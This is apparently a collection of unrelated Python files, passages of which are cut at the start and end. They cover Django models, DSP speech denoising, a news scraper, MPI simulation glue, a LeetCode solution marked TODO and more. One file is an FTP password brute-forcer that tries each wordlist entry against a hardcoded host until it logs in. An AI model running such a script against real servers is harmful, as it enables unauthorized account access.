description = m.TextField(blank=True, null=True)
active = m.BooleanField(default=True)
start_date = m.DateField()
iteration_starts = m.IntegerField(choices=DAY, default=0)
iteration_length = m.IntegerField(default=2)
initial_velocity = m.IntegerField(default=10)
velocity_time_period = m.IntegerField(default=3)
current_velocity = m.IntegerField(default=10)
def __unicode__(self):
return self.name
class Iteration(Model):
project = m.ForeignKey(Project)
name = m.CharField(max_length=200, blank=True, null=True)
description = m.TextField(blank=True, null=True)
start_date = m.DateField(blank=True, null=True)
end_date = m.DateField(blank=True, null=True)
team_strength = m.DecimalField(decimal_places=2, max_digits=1, default=1)
def __unicode__(self):
return self.name
class Story(Model):
class Meta:
verbose_name_plural = 'stories'
project = m.ForeignKey(Project, related_name='stories')
iteration = m.ForeignKey(Iteration, blank=True, null=True)
tracker = m.ForeignKey(User, blank=True, null=True)
customer = m.ForeignKey(User, blank=True, null=True,
related_name='story_customer')
name = m.CharField(max_length=200)
status = m.IntegerField(choices=STATUSES, default=0)
accept_date = m.DateField(blank=True, null=True)
description = m.TextField(blank=True, null=True)
order = m.IntegerField(default=0)
def __unicode__(self):
return self.name
class Release(Story):
release_date = m.DateField()
class Feature(Story):
points = m.IntegerField(blank=True, null=True)
class Bug(Story):
pass
class Task(Model):
story = m.ForeignKey(Story)
name = m.CharField(max_length=200)
completed = m.BooleanField(default=False)
order = m.IntegerField(default=0)
def __unicode__(self):
return self.name
class Comment(Model):
user = m.ForeignKey(User)
story = m.ForeignKey(Story)
post_date = m.DateTimeField(auto_now=True)
comment = m.TextField()
def __unicode__(self):
return self.comment
|
import logging
from eventlet.zipkin import api
__original_handle__ = logging.Logger.handle
def _patched_handle(self, record):
__original_handle__(self, record)
api.put_annotation(record.getMessage())
def patch():
logging.Logger.handle = _patched_handle
def unpatch():
logging.Logger.handle = __original_handle__
|
import os
import unittest
from persistence import Persistence
class TestPersistence(unittest.TestCase):
def setUp(self) -> None:
self.path = os.path.dirname(os.path.realpath(__file__))
self.name = "test_file"
self.persistence = Persistence(self.path, self.name)
def tearDown(self) -> None:
os.remove(self.persistence.path())
def test_exists(self) -> None:
self.assertTrue(self.persistence.exists())
def test_path(self) -> None:
expected = f"{self.path}/{self.name}.yaml"
actual = self.persistence.path()
self.assertEqual(expected, actual)
def test_reset(self) -> None:
with open(self.persistence.path(), "w") as f:
f.write("My best joke!")
self.persistence.reset()
with open(self.persistence.path(), "r") as f:
self.assertEqual("---", f.read())
if __name__ == "__main__":
unittest.main()
|
import ftplib
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
init()
# hostname or IP address of the FTP server
host = "192.168.1.113"
# username of the FTP server, root as default for linux
user = "test"
# port of FTP, aka 21
port = 21
def is_correct(password):
# initialize the FTP server object
server = ftplib.FTP()
print(f"[!] Trying", password)
try:
# tries to connect to FTP server with a timeout of 5
server.connect(host, port, timeout=5)
# login using the credentials (user & password)
server.login(user, password)
except ftplib.error_perm:
# login failed, wrong credentials
return False
else:
# correct credentials
print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET)
return True
# read the wordlist of passwords
passwords = open("wordlist.txt").read().split("\n")
print("[+] Passwords to try:", len(passwords))
# iterate over passwords one by one
# if the password is found, break out of the loop
for password in passwords:
if is_correct(password):
break
|
#!/usr/bin/env python
#
# Copyright 2018 Alexandru Catrina
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import wx
class DetailView(object):
def __init__(self, panel):
self.panel = panel
self.current_record = None
def get_record(self):
return self.current_record
def get_sizer(self):
sizer = wx.BoxSizer(wx.HORIZONTAL)
# record details (name, bounce, connection hash)
st_record = wx.StaticBox(self.panel, wx.ID_ANY, "Record details")
sb_record = wx.StaticBoxSizer(st_record, wx.VERTICAL)
sizer.Add(sb_record, 0, wx.EXPAND | wx.ALL, 5)
# connection details (protocol, host, ip, port, user)
st_connection = wx.StaticBox(self.panel, wx.ID_ANY,
"Connection details")
sb_connection = wx.StaticBoxSizer(st_connection, wx.VERTICAL)
sizer.Add(sb_connection, 0, wx.EXPAND | wx.ALL, 5)
# display record name
static = wx.StaticText(self.panel, wx.ID_ANY, "Name:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_record_name = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(200, -1))
row.Add(self.detail_record_name)
sb_record.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display record hash
static = wx.StaticText(self.panel, wx.ID_ANY, "Hash:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_record_hash = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(200, -1))
row.Add(self.detail_record_hash)
sb_record.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display record jump
static = wx.StaticText(self.panel, wx.ID_ANY, "Bounce:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_record_jump = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(200, -1))
row.Add(self.detail_record_jump)
sb_record.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display connection protocol and port
static = wx.StaticText(self.panel, wx.ID_ANY, "Protocol:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_connection_protocol = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(400, -1))
row.Add(self.detail_connection_protocol)
sb_connection.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display connection host and ip
static = wx.StaticText(self.panel, wx.ID_ANY, "Hostname:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_connection_hostname = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(400, -1))
row.Add(self.detail_connection_hostname)
sb_connection.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display connection username
static = wx.StaticText(self.panel, wx.ID_ANY, "Username:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_connection_username = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(400, -1))
row.Add(self.detail_connection_username)
sb_connection.Add(row, 0, wx.EXPAND | wx.ALL, 2)
return sizer
def update(self, record):
self.detail_record_name.SetLabel(record.name)
self.detail_record_hash.SetLabel(record.auth_signature)
self.detail_record_jump.SetLabel(record.jump_signature)
self.detail_connection_username.SetLabel(record.user)
hostname = "%s (%s)" % (record.host, record.ipv4)
self.detail_connection_hostname.SetLabel(hostname)
protocol = "%s (%s)" % (record.scheme, record.port)
self.detail_connection_protocol.SetLabel(protocol)
self.current_record = record
|
#
# Class Enhancement
from scipy.signal import lfilter
from spectrum import pmtm
from Universal import *
from VAD import *
class Enhancement:
def simplesubspec(self, signal, wlen, inc, NIS, a, b):
"""
simple spectrum subtraction
:param signal: noisy speech
:param wlen: window length
:param inc: frame shift
:param NIS: leading noise segment length
:param a: over subtraction factor
:param b: gain factor
:return output: denoise speech
"""
wnd = np.hamming(wlen) # window function
N = len(signal) # signal length
speech = Speech()
y = speech.enframe(signal, list(wnd), inc).T # enframe
fn = y.shape[1] # frame number
y_fft = np.fft.fft(y, axis=0) # FFT
y_a = np.abs(y_fft) # amplitude
y_phase = np.angle(y_fft) # phase
y_a2 = y_a ** 2 # energy
Nt = np.mean(y_a2[:, 0: NIS], 1) # average energy in noise segment
nl2 = int(wlen / 2) + 1 # positvie frequency
temp = np.zeros(nl2) # energy
U = np.zeros(nl2) # one frame amplitude
X = np.zeros((nl2, fn)) # amplitude
for i in range(fn): # spectrum subtraction
for k in range(nl2):
if (y_a2[k, i] > a * Nt[k]):
temp[k] = y_a2[k, i] - a * Nt[k]
else:
temp[k] = b * y_a2[k, i]
U[k] = np.sqrt(temp[k])
X[:, i] = U
output = speech.OverlapAdd2(X, y_phase[0:nl2, :], wlen, inc) # synthesis
Nout = len(output) # spectrum subtraction length = original length?
if Nout > N:
output = output[0: N]
else:
output = np.concatenate([output, np.zeros(N - Nout)])
output = output / np.max(np.abs(output)) # normalization
return output
def segment(self, siganl, W=256, SP=0.4, Window=np.hamming(256)):
"""
chops a signal to overlapping windowed segments
:param siganl: one dimentional signal
:param W: sample number per window (default = 25)
:param SP: shift percent (default = 0.4)
:param Window: window function (default: hamming)
:return Seg: segment matrix
"""
if (W != 256):
Window = np.hamming(W)
Window = Window.reshape(-1, 1) # make it a column vector
L = len(siganl)
SP = int(W * SP)
N = int((L - W) / SP + 1) # number of segments
Index = np.tile(np.arange(0, W), (N, 1)) + np.tile(SP * np.arange(0, N).reshape(-1, 1), (1, W))
Index = Index.T
hw = np.tile(Window, (1, N))
Seg = siganl[Index] * hw
return Seg
def SSBoll79(self, signal, fs, IS=None):
"""
Spectral Subtraction based on Boll 79. Amplitude spectral subtraction
Includes Magnitude Averaging and Residual noise Reduction
:param signal: noisy signal
:param fs: sampling frequency
:param IS: initial silence (noise only) length in seconds (default value is .25 sec)
:return output: denoise signal
"""
if not IS:
IS = 0.25 # seconds
elif isinstance(IS, float):
W = int(0.025 * fs) # window length 25ms
nfft = W
# overlap-add method works good with this shift value
SP = 0.4 # frame shift 40% (10ms)
wnd = np.hamming(W)
# IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM FROM HERE.....
if isinstance(IS, dict):
W = IS['windowsize']
SP = IS['shiftsize'] / W
nfft = IS['nfft']
wnd = IS['window']
if hasattr(IS, 'IS'):
IS = IS['IS']
else:
IS = 0.25
# .......IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM T0 HERE
NIS = int((IS * fs - W) / (SP * W) + 1) # number of initial silence segments
Gamma = 1 # 1: magnitude, 2: power spectrum
y = self.segment(signal, W, SP, wnd)
Y = np.fft.fft(y, axis=0)
FreqResol, NumberofFrames = Y.shape
YPhase = np.angle(Y[0: int(NumberofFrames / 2) + 1, :]) # noisy speech phase
Y = np.abs(Y[0: int(NumberofFrames / 2) + 1, :]) ** Gamma # Spectrogram
N = np.mean(Y[:, 0:NIS].T, axis=0).T # initial noise power spectrum mean
NRM = np.zeros(N.shape) # Noise Residual Maximum (Initialization)
NoiseCounter = 0
NoiseLength = 9 # smoothing factor for noise updating
Beta = 0.03
YS = Y # Y magnitude average
for i in np.arange(1, NumberofFrames - 1):
YS[:, i] = (YS[:, i - 1] + YS[:, i] + YS[:, i + 1]) / 3
X = np.zeros(Y.shape)
D = np.zeros(FreqResol)
for i in range(NumberofFrames):
# Magnitude Spectrum Distance VAD
NoiseFlag, SpeechFlag, NoiseCounter, Dist = VAD().vad(Y[:, i] ** (1 / Gamma), N ** (1 / Gamma),
NoiseCounter)
if SpeechFlag == 0:
N = (NoiseLength * N + Y[:, i]) / (NoiseLength + 1) # update and smooth noise
NRM = np.maximum(NRM, YS[:, i] - N) # update maximum noise residue
X[:, i] = Beta * Y[:, i]
else:
D = YS[:, i] - N # spectral subtraction
if i > 0 and i < NumberofFrames - 1: # residual noise reduction
for j in range(len(D)):
if D[j] < NRM[j]:
D[j] = np.min(np.array([D[j], YS[j, i - 1] - N[j], YS[j, i + 1] - N[j]]))
D[D < 0] = 0
X[:, i] = D
output = Speech().OverlapAdd2(X ** (1 / Gamma), YPhase, int(W), int(SP * W))
return output
def SSBoll79_2(self, signal, fs, T1, IS=None):
"""
Spectral Subtraction based on Boll 79. Amplitude spectral subtraction
Includes Magnitude Averaging and Residual noise Reduction
:param signal: noisy signal
:param fs: sampling frequency
:param IS: initial silence (noise only) length in seconds (default value is .25 sec)
:return output: denoise signal
"""
if not IS:
IS = 0.25 # seconds
W = int(0.025 * fs) # window length 25ms
nfft = W
# overlap-add method works good with this shift value
SP = 0.4 # frame shift 40% (10ms)
wnd = np.hamming(W)
elif isinstance(IS, float):
W = int(0.025 * fs) # window length 25ms
nfft = W
# overlap-add method works good with this shift value
SP = 0.4 # frame shift 40% (10ms)
wnd = np.hamming(W)
# IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM FROM HERE.....
if isinstance(IS, dict):
W = IS['windowsize']
SP = IS['shiftsize'] / W
nfft = IS['nfft']
wnd = IS['window']
if hasattr(IS, 'IS'):
IS = IS['IS']
else:
IS = 0.25
# .......IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM T0 HERE
NIS = int((IS * fs - W) / (SP * W) + 1) # number of initial silence segments
Gamma = 1 # 1: magnitude, 2: power spectrum
y = self.segment(signal, W, SP, wnd)
Y = np.fft.fft(y, axis=0)
FreqResol, NumberofFrames = Y.shape
YPhase = np.angle(Y[0: int(NumberofFrames / 2) + 1, :]) # noisy speech phase
Y = np.abs(Y[0: int(NumberofFrames / 2) + 1, :]) ** Gamma # Spectrogram
N = np.mean(Y[:, 0:NIS].T, axis=0).T # initial noise power spectrum mean
NRM = np.zeros(N.shape) # Noise Residual Maximum (Initialization)
NoiseCounter = 0
NoiseLength = 9 # smoothing factor for noise updating
Beta = 0.03
fn = NumberofFrames
miniL = 5
voiceseg, vosl, SF, Ef = VAD().pitch_vad1(y, fn, T1, miniL)
YS = Y # Y magnitude average
for i in np.arange(1, NumberofFrames - 1):
YS[:, i] = (YS[:, i - 1] + YS[:, i] + YS[:, i + 1]) / 3
X = np.zeros(Y.shape)
D = np.zeros(FreqResol)
for i in range(NumberofFrames):
# Magnitude Spectrum Distance VAD
NoiseFlag, SpeechFlag, NoiseCounter, Dist = VAD().vad(Y[:, i] ** (1 / Gamma), N ** (1 / Gamma),
NoiseCounter)
SpeechFlag = SF[i]
if SpeechFlag == 0:
N = (NoiseLength * N + Y[:, i]) / (NoiseLength + 1) # update and smooth noise
NRM = np.maximum(NRM, YS[:, i] - N) # update maximum noise residue
X[:, i] = Beta * Y[:, i]
else:
D = YS[:, i] - N # spectral subtraction
if i > 0 and i < NumberofFrames - 1: # residual noise reduction
for j in range(len(D)):
if D[j] < NRM[j]:
D[j] = np.min(np.array([D[j], YS[j, i - 1] - N[j], YS[j, i + 1] - N[j]]))
D[D < 0] = 0
X[:, i] = D
output = Speech().OverlapAdd2(X ** (1 / Gamma), YPhase, int(W), int(SP * W))
output = output / np.max(np.abs(output)) # normalized
return output
def Mtmpsd_ssb(self, signal, wlen, inc, NIS, alpha, beta, c):
"""
Spectral Subtraction
Multitaper Spectrum Estimation
Short-term Energy Entropy Ratio
:param signal: noisy speech
:param wlen: frame length
:param inc: frame shift
:param NIS: leding unvoiced (noise) frame number
:param alpha: over subtraction factor in spectral subtraction
:param beta: gain compensation factor
:param c: gain factor (0: power spectrum, 1: amplitude spectrum)
:return output: denoise speech
"""
w2 = int(wlen / 2) + 1
wind = np.hamming(wlen) # hamming window
y = Speech().enframe(signal, list(wind), inc).T # enframe
fn = y.shape[1] # frame number
N = len(signal) # signal length
fft_frame = np.fft.fft(y, axis=0) # FFT
abs_frame = np.abs(fft_frame[0: w2, :]) # positive frequency amplitude
ang_frame = np.angle(fft_frame[0: w2, :]) # positive frequency phase
# smoothing in 3 neighbour frame
abs_frame_backup = abs_frame
for i in range(1, fn - 1, 2):
abs_frame_backup[:, i] = 0.25 * abs_frame[:, i - 1] + 0.5 * abs_frame[:, i] + 0.25 * abs_frame[:, i + 1]
abs_frame = abs_frame_backup
# multitaper spectrum estimation power spectrum
PSDFrame = np.zeros((w2, fn)) # PSD in each frame
for i in range(fn):
# PSDFrame[:, i] = pmtm(y[:, i], NW = 3, NFFT=wlen)
Sk_complex, weights, eigenvalues = pmtm(y[:, i], NW=3, NFFT=wlen)
Sk = (np.abs(Sk_complex) ** 2).transpose()
PSDTwoSide = np.mean(Sk * weights, axis=1)
PSDFrame[:, i] = PSDTwoSide[0: w2]
PSDFrameBackup = PSDFrame
for i in range(1, fn - 1, 2):
PSDFrameBackup[:, i] = 0.25 * PSDFrame[:, i - 1] + 0.5 * PSDFrame[:, i] + 0.25 * PSDFrame[:, i + 1]
PSDFrame = PSDFrameBackup
# average PSD of leading unvoiced segment
NoisePSD = np.mean(PSDFrame[:, 0: NIS], axis=1)
# spectral subtraction -> gain factor
g = np.zeros((w2, fn)) # gain factor
g_n = np.zeros((w2, fn))
for k in range(fn):
g[:, k] = (PSDFrame[:, k] - alpha * NoisePSD) / PSDFrame[:, k]
g_n[:, k] = beta * NoisePSD / PSDFrame[:, k]
gix = np.where(g[:, k] < 0)
g[gix, k] = g_n[gix, k]
gf = g
if c == 0:
g = gf
else:
g = np.sqrt(gf)
SubFrame = g * abs_frame # spectral subtraction amplitude
output = Speech().OverlapAdd2(SubFrame, ang_frame, wlen, inc) # synthesis
output = output / np.max(np.abs(output)) # normalized
ol = len(output)
if ol < N:
output = np.concatenate((output, np.zeros(N - ol)))
return output
def WienerScalart96m_2(self, signal, fs, T1, IS):
"""
Wiener filter based on tracking a priori SNR usingDecision-Directed
method, proposed by Scalart et al 96. In this method it is assumed that
SNRpost=SNRprior +1. based on this the Wiener Filter can be adapted to a
model like Ephraims model in which we have a gain function which is a
function of a priori SNR and a priori SNR is being tracked using Decision
Directed method.
:param signal: noisy signal
:param fs: sampling frequency
:param IS: initial silence (noise only) length in seconds (default value is .25 sec)
:param T1: threshold
:return output: denoise signal
"""
if not IS:
IS = 0.25 # seconds
W = int(0.025 * fs) # window length 25ms
nfft = W
# overlap-add method works good with this shift value
SP = 0.4 # frame shift 40% (10ms)
wnd = np.hamming(W)
elif isinstance(IS, float):
W = int(0.025 * fs) # window length 25ms
nfft = W
# overlap-add method works good with this shift value
SP = 0.4 # frame shift 40% (10ms)
wnd = np.hamming(W)
# IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM FROM HERE.....
if isinstance(IS, dict):
W = IS['windowsize']
SP = IS['shiftsize'] / W
nfft = IS['nfft']
wnd = IS['window']
if hasattr(IS, 'IS'):
IS = IS['IS']
else:
IS = 0.25
# .......IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM T0 HERE
pre_emph = 0 # pre_emphasis parameter
signal = lfilter(np.array([1, -1 * pre_emph]), 1, signal) # pre-emphasis
NIS = int((IS * fs - W) / (SP * W) + 1) # number of initial silence segments
y = self.segment(signal, W, SP, wnd) # enframe
Y = np.fft.fft(y, axis=0) # FFT
FreqResol, NumberofFrames = Y.shape
YPhase = np.angle(Y[0: int(NumberofFrames / 2) + 1, :]) # noisy speech phase
Y = np.abs(Y[0: int(NumberofFrames / 2) + 1, :]) # Spectrogram
LambdaD = np.mean(Y[:, 0 : NIS] ** 2).T # initial noise power spectrum variance
N = np.mean(Y[:, 0:NIS].T, axis=0).T # initial average noise power spectrum
alpha = 0.99
fn = NumberofFrames
miniL = 5
voiceseg, vosl, SF, Ef = VAD().pitch_vad1(y, fn, T1, miniL) # vad
NoiseCounter = 0
NoiseLength = 9 # smoothing factor for noise updating
G = np.ones(N.shape) # power estimation initialization
Gamma = G
X = np.zeros(Y.shape) # Y magnitude average
for i in np.arange(1, NumberofFrames - 1):
SpeechFlag = SF[i]
if i <= NIS: # leading unvoiced segment
SpeechFlag = 0
NoiseCounter = 100
if SpeechFlag == 0: # update noise spectrum in unvoiced segment
N = (NoiseLength * N + Y[:, i])/(NoiseLength + 1)
LambdaD = (NoiseLength * LambdaD + Y[:, i] ** 2)/(NoiseLength + 1) # update and smoothing noise variance
gammaNew = (Y[:, i] ** 2)/LambdaD # post SNR
xi = alpha * (G ** 2) * Gamma + (1 - alpha) * np.max(gammaNew - 1, 0) # senior SNR
Gamma = gammaNew
G = (xi/(xi + 1)) # wiener spectrum estimation
X[:, i] = G * Y[:, i] # wiener filter spectrum
output = Speech().OverlapAdd2(X, YPhase, int(W), int(SP * W))
output = lfilter([1], np.array([1, -1 * pre_emph]), output)
output = output / np.max(np.abs(output)) # normalized
return output
|
from bs4 import BeautifulSoup as web
from basic_parser import Parser
class Kommersant_parser(Parser):
def __init__(self):
super().__init__("http://www.kommersant.ru/RSS/news.xml")
self.encoding = "windows-1251"
self.site_encoding = "windows-1251"
def grab(self, url):
content = web(self.get_content(url, self.site_encoding), "html.parser")
obj = {}
if content.select(".article_name"):
obj["title"] = content.select(".article_name")[0].text
if content.select(".article_text_wrapper > p"):
obj["content"] = list(
map(
lambda x: x.text,
content.select(".article_text_wrapper > p")
)
)
return obj
if __name__ == "__main__":
kom = Kommersant_parser()
news = kom.news()
print(news)
url = news[0]["link"]
title = news[0]["title"]
print(title, url)
data = kom.grab(url)
print(data)
|
#!/usr/bin/env python2
from argparse import ArgumentParser
from markovmusic.player import Player
parser = ArgumentParser()
parser.add_argument('--input',
default='input/bach', metavar='PATH',
help='MIDI input, either a single file or a directory')
parser.add_argument('--chain-len',
type=int, default=4, metavar='LENGTH',
help='Length of Markov chains to generate')
parser.add_argument('--time-scale', metavar='SCALE',
type=int, default=1,
help='Temporal scale')
parser.add_argument('--port',
default=None, metavar='NAME',
help='Output MIDI port name')
parser.add_argument('--list-ports',
action='store_true',
help='List available MIDI ports')
player = Player(parser.parse_args())
player.run()
|
import numpy as np
import pandas as pd
from .utils_complexity_embedding import complexity_embedding
def fisher_information(signal, delay=1, dimension=2):
"""**Fisher Information (FI)**
The Fisher information was introduced by R. A. Fisher in 1925, as a measure of "intrinsic
accuracy" in statistical estimation theory. It is central to many statistical fields far beyond
that of complexity theory. It measures the amount of information that an observable random
variable carries about an unknown parameter. In complexity analysis, the amount of information
that a system carries "about itself" is measured. Similarly to :func:`SVDEn <entropy_svd>`, it
is based on the Singular Value Decomposition (SVD) of the :func:`time-delay embedded <complexity_embedding>`
signal. The value of FI is usually anti-correlated with other measures of complexity (the more
information a system withholds about itself, and the more predictable and thus, less complex it
is).
See Also
--------
entropy_svd, information_mutual, complexity_embedding, complexity_delay, complexity_dimension
Parameters
----------
signal : Union[list, np.array, pd.Series]
The signal (i.e., a time series) in the form of a vector of values.
delay : int
Time delay (often denoted *Tau* :math:`\\tau`, sometimes referred to as *lag*) in samples.
See :func:`complexity_delay` to estimate the optimal value for this parameter.
dimension : int
Embedding Dimension (*m*, sometimes referred to as *d* or *order*). See
:func:`complexity_dimension` to estimate the optimal value for this parameter.
Returns
-------
fi : float
The computed fisher information measure.
info : dict
A dictionary containing additional information regarding the parameters used
to compute fisher information.
Examples
----------
.. ipython:: python
import neurokit2 as nk
signal = nk.signal_simulate(duration=2, frequency=5)
fi, info = nk.fisher_information(signal, delay=10, dimension=3)
fi
"""
# Sanity checks
if isinstance(signal, (np.ndarray, pd.DataFrame)) and signal.ndim > 1:
raise ValueError(
"Multidimensional inputs (e.g., matrices or multichannel data) are not supported yet."
)
embedded = complexity_embedding(signal, delay=delay, dimension=dimension)
W = np.linalg.svd(embedded, compute_uv=False)
W /= np.sum(W) # normalize singular values
FI_v = (W[1:] - W[:-1]) ** 2 / W[:-1]
return np.sum(FI_v), {"Dimension": dimension, "Delay": delay, "Values": FI_v}
|
'''
黄金矿工
你要开发一座金矿,地质勘测学家已经探明了这座金矿中的资源分布,并用大小为 m * n 的网格 grid 进行了标注。
每个单元格中的整数就表示这一单元格中的黄金数量;如果该单元格是空的,那么就是 0。
为了使收益最大化,矿工需要按以下规则来开采黄金:
每当矿工进入一个单元,就会收集该单元格中的所有黄金。
矿工每次可以从当前位置向上下左右四个方向走。
每个单元格只能被开采(进入)一次。
不得开采(进入)黄金数目为 0 的单元格。
矿工可以从网格中 任意一个 有黄金的单元格出发或者是停止。
示例 1:
输入:grid = [[0,6,0],[5,8,7],[0,9,0]]
输出:24
解释:
[[0,6,0],
[5,8,7],
[0,9,0]]
一种收集最多黄金的路线是:9 -> 8 -> 7。
示例 2:
输入:grid = [[1,0,7],[2,0,6],[3,4,5],[0,3,0],[9,0,20]]
输出:28
解释:
[[1,0,7],
[2,0,6],
[3,4,5],
[0,3,0],
[9,0,20]]
一种收集最多黄金的路线是:1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7。
提示:
1 <= grid.length, grid[i].length <= 15
0 <= grid[i][j] <= 100
最多 25 个单元格中有黄金。
'''
from typing import List
'''
思路:DFS
从任意节点出发,遍历所有路径,找到最大的2个路径和(因为不能重复走,所以只能选择最大的2个路径和)
时间复杂度:O(m*n*m*n)
空间复杂度:O(m*n)
TODO
'''
class Solution:
def getMaximumGold(self, grid: List[List[int]]) -> int:
m, n = len(grid), len(grid[0])
directs = [(-1, 0), (0, -1), (1, 0), (0, 1)]
maxGold = 0
def dfs(i, j, visited):
nonlocal maxGold
visited[i][j] = True
path1 = 0
path2 = 0
for a, b in directs:
x, y = a + i, b + j
if 0 <= x < m and 0 <= y < n and grid[x][y] > 0 and not visited[x][y]:
g = dfs(x, y, visited)
if g > path1:
path2 = path1
path1 = g
elif g > path2:
path2 = g
maxGold = max(maxGold, grid[i][j] + path1 + path2)
return grid[i][j] + path1
for i in range(m):
for j in range(n):
visited = [[False] * n for _ in range(m)]
if grid[i][j]:
dfs(i, j, visited)
return maxGold
s = Solution()
print(
s.getMaximumGold([[0, 0, 0, 22, 0, 24], [34, 23, 18, 0, 23, 2], [11, 39, 20, 12, 0, 0], [39, 8, 0, 2, 0, 1], [19, 32, 26, 20, 20, 30],
[0, 38, 26, 0, 29, 31]]))
print(s.getMaximumGold([[0, 6, 0], [5, 8, 7], [0, 9, 0]]))
print(s.getMaximumGold([[1, 0, 7, 0, 0, 0], [2, 0, 6, 0, 1, 0], [3, 5, 6, 7, 4, 2], [4, 3, 1, 0, 2, 0], [3, 0, 5, 0, 20, 0]]))
print(s.getMaximumGold([[1, 0, 7], [2, 0, 6], [3, 4, 5], [0, 3, 0], [9, 0, 20]]))
|
# Copyright 2020 Forschungszentrum Jülich GmbH and Aix-Marseille Université
# "Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements; and to You under the Apache License, Version 2.0. "
import numpy as np
from mpi4py import MPI
import os
import time
import sys
def simulate_nest_generator(path):
'''
simulate the spike generator of the translator for tvb to nest
:param path: the path to the file for the connections
:return:
'''
print("Nest_Input:" + path)
print("Nest_Input :Waiting for port details");sys.stdout.flush()
while not os.path.exists(path):
print ("Port file not found yet, retry in 1 second")
time.sleep(1)
'''
### OLD Code
### TODO: further investigate the '.unlock' file approach
max_mpi_connection_attempts = 50
file_unlock=False
for attempt in range(max_mpi_connection_attempts):
print("file to read",path);sys.stdout.flush()
if os.path.exists(path+".unlock"):
print ("MPI connection file available after t={0} seconds".format(attempt));sys.stdout.flush()
file_unlock=True
break
if file_unlock is False:
print("Could file not unlocked after 20 attempts, exit");sys.stdout.flush()
sys.exit (1)
'''
fport = open(path, "r")
port=fport.readline()
fport.close()
print("Nest_Input :wait connection "+port);sys.stdout.flush()
comm = MPI.COMM_WORLD.Connect(port)
print('Nest_Input :connect to '+port);sys.stdout.flush()
status_ = MPI.Status()
# NOTE: hardcoded...
ids=np.arange(0,10,1) # random id of spike detector
print(ids);sys.stdout.flush()
while(True):
# Send start simulation
comm.Send([np.array([True], dtype='b'), MPI.CXX_BOOL], dest=1, tag=0)
# NOTE: hardcoded...
comm.Send([np.array(10,dtype='i'), MPI.INT], dest=1, tag=0)
# send ID of spike generator
comm.Send([np.array(ids,dtype='i'), MPI.INT], dest=1, tag=0)
# receive the number of spikes for updating the spike detector
size=np.empty(11,dtype='i')
comm.Recv([size,11, MPI.INT], source=1, tag=ids[0],status=status_)
print ("Nest_Input (" + str(ids[0]) + ") :receive size : " + str(size));sys.stdout.flush()
# receive the spikes for updating the spike detector
data = np.empty(size[0], dtype='d')
comm.Recv([data,size[0], MPI.DOUBLE],source=1,tag=ids[0],status=status_)
print ("Nest_Input (" + str(id) + ") : " + str(np.sum(data)));sys.stdout.flush()
# printing value and exist
print ("Nest_Input: Before print ");sys.stdout.flush()
if ids[0] == 0:
print ("Nest_Input:" + str([ids[0], data,np.sum(data)]) );sys.stdout.flush()
print ("Nest_Input: debug end of loop");sys.stdout.flush()
#send ending the the run of the simulation
print("Nest_Input: Debug before send");sys.stdout.flush()
comm.Send([np.array([True], dtype='b'), MPI.CXX_BOOL], dest=1, tag=1)
print("Nest_Input: Debug after send");sys.stdout.flush()
print ("Nest_Input: before break");sys.stdout.flush()
# print ("Nest_Input: before break" + str(data > 10000));sys.stdout.flush()
if np.any(data > 10000):
break
# closing the connection at this end
print('Nest_Input : Disconnect')
comm.Send([np.array([True], dtype='b'), MPI.CXX_BOOL], dest=1, tag=2)
comm.Disconnect()
MPI.Close_port(port)
print('Nest_Input :exit')
MPI.Finalize()
if __name__ == "__main__":
import sys
